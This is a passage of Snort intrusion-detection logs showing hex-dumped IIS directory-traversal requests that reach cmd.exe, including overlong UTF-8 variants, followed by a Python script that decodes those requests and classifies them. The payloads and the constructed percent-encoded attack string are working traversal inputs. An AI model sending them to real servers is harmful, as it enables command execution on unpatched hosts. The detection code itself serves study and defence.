hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
TCP: port=39965 -> dport: 80 flags=***AP*** seq=124410128
ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2129) [2001-05-06 18:08:30] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
TCP: port=40329 -> dport: 80 flags=***AP*** seq=148806580
ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2130) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
TCP: port=40585 -> dport: 80 flags=***AP*** seq=164770468
ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2131) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
TCP: port=43268 -> dport: 80 flags=***AP*** seq=341732227
ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2132) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
TCP: port=43341 -> dport: 80 flags=***AP*** seq=346538415
ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2133) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
TCP: port=46205 -> dport: 80 flags=***AP*** seq=530846163
ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2134) [2001-05-06 18:08:42] 56
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
TCP: port=46362 -> dport: 80 flags=***AP*** seq=541605131
ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
***************************SCAN #3**********************************************************
----------------------------------------------------------------------------
--
#(1 - 2147) [2001-05-07 02:22:21] spp_portscan: PORTSCAN DETECTED from 210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
IPv4: 210.107.187.10 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
TCP: port=50799 -> dport: 80 flags=******S* seq=2338995863
ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2181) [2001-05-07 12:01:30] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
TCP: port=61125 -> dport: 80 flags=***AP*** seq=941135384
ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2182) [2001-05-07 12:01:31] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
TCP: port=61278 -> dport: 80 flags=***AP*** seq=951451170
ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
************************SCAN #4*******************************************
#(1 - 2150) [2001-05-07 03:07:07] 340
IPv4: 202.107.211.177 -> 209.46.94.80
hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
TCP: port=56725 -> dport: 80 flags=******S* seq=3486124858
ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2173) [2001-05-07 10:15:58] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
TCP: port=32840 -> dport: 80 flags=***AP*** seq=1452480610
ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2174) [2001-05-07 10:16:00] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
TCP: port=33972 -> dport: 80 flags=***AP*** seq=1515064652
ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
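The request variants in the scan reports escalate from a bare "..%c.." through "..%e0.." to raw multi-byte prefixes (F0 80 80 AF, F8 80 80 80 AF, FC 80 80 80 80 AF) placed between ".." and the next "/". Those raw sequences are overlong UTF-8 encodings of the slash: a 7-bit character spelled out in more bytes than it needs, which the IIS canonicalization described in VU#111677 accepted as a path separator, so "..<overlong />.." climbs out of the /scripts virtual directory. The script below is an added example, not code from the advisory or from the poster: it rebuilds the TCP payload from a Snort hex dump, decodes the request path the way the vulnerable server effectively would (percent-decode, then fold overlong sequences), and labels each request. Two records are copied from scan #1 above (entries 2081 and 2091); the percent-encoded and benign requests are constructed, and the function names (payload_from_hexdump, decode_overlong, analyze_request, classify) are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Two Snort records copied from scan #1 above (entries 2081 and 2091); only the
# payload dump is kept. PERCENT_ENCODED and BENIGN are constructed samples.
SNORT_PLAIN = """\
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
"""
SNORT_OVERLONG = """\
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
"""
PERCENT_ENCODED = b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"
BENIGN = b"GET /products/index.html HTTP/1.0\r\n\r\n"

_HEX_ROW = re.compile(r"^\s*[0-9A-Fa-f]{3} : ((?:[0-9A-Fa-f]{2}(?: |$))+)")
_LENGTH = re.compile(r"Payload: length = (\d+)")


def payload_from_hexdump(record: str) -> bytes:
    """Rebuild the TCP payload from a Snort-style hex dump. Each row is
    '<offset> : <hex bytes> <ascii>'; the hex run ends at the first token that is
    not two hex digits, and the declared payload length trims anything the ASCII
    column might contribute by coincidence."""
    buf, declared = bytearray(), None
    for row in record.splitlines():
        m = _LENGTH.search(row)
        if m:
            declared = int(m.group(1))
            continue
        m = _HEX_ROW.match(row)
        if m:
            buf.extend(bytes.fromhex(m.group(1).strip())[:16])
    return bytes(buf if declared is None else buf[:declared])


def decode_overlong(data: bytes):
    """Fold overlong UTF-8 sequences back to the ASCII byte they encode.
    Accepts the original 2- to 6-byte forms, which is what made the IIS
    decoder exploitable. Returns (normalized bytes, number of overlong sequences)."""
    out, overlong, i = bytearray(), 0, 0
    while i < len(data):
        b = data[i]
        if b < 0xC0 or b > 0xFD:          # ASCII, stray continuation byte, or invalid lead
            out.append(b); i += 1; continue
        length = 2 if b < 0xE0 else 3 if b < 0xF0 else 4 if b < 0xF8 else 5 if b < 0xFC else 6
        cp = b & (0x7F >> length)         # payload bits of the lead byte
        tail = data[i + 1:i + length]
        if len(tail) == length - 1 and all(0x80 <= t <= 0xBF for t in tail):
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            if cp < 0x80:                 # a 7-bit value spelled in more bytes than needed
                overlong += 1
                out.append(cp)
            else:                         # legitimate multi-byte character: keep as-is
                out.extend(data[i:i + length])
            i += length
        else:
            out.append(b); i += 1
    return bytes(out), overlong


def analyze_request(raw: bytes) -> dict:
    """Decode the request-target (percent-decode, then fold overlong UTF-8) and
    report whether the path climbs out of the web root and names a command shell."""
    request_line = raw.split(b"\r\n", 1)[0].split(b" ")
    target = request_line[1] if len(request_line) > 1 else b""
    path = unquote_to_bytes(target.split(b"?", 1)[0])
    normalized, overlong = decode_overlong(path)
    segments = re.split(rb"[/\\]", normalized)
    depth, escapes = 0, False
    for seg in segments:
        if seg == b"..":
            depth -= 1
            escapes = escapes or depth < 0
        elif seg and seg != b".":
            depth += 1
    return {
        "path": normalized.decode("latin-1"),
        "overlong": overlong,
        "escapes_webroot": escapes,
        "names_shell": segments[-1].lower() in (b"cmd.exe", b"root.exe"),
    }


def classify(raw: bytes) -> str:
    r = analyze_request(raw)
    if r["names_shell"] and (r["escapes_webroot"] or r["overlong"]):
        return "worm-like"      # traversal to cmd.exe: the CA-2001-11 / VU#111677 pattern
    if r["names_shell"] or r["escapes_webroot"]:
        return "suspicious"
    return "benign"


if __name__ == "__main__":
    for name, raw in (("snort 2081", payload_from_hexdump(SNORT_PLAIN)),
                      ("snort 2091", payload_from_hexdump(SNORT_OVERLONG)),
                      ("percent", PERCENT_ENCODED), ("benign", BENIGN)):
        print(f"{name:<11}{classify(raw):<11}{analyze_request(raw)}")
```

Record 2081 ("..%c..") has no valid percent escape and no overlong sequence, so it does not actually escape /scripts after decoding; it is still labelled "suspicious" because it asks for cmd.exe. Record 2091 folds F0 80 80 AF to "/", giving /scripts/../../winnt/system32/cmd.exe, which is the traversal the advisory's IIS log shows. A web-log checker built on the same analyze_request function would run the W3C cs-uri-stem field through decode_overlong in the same way.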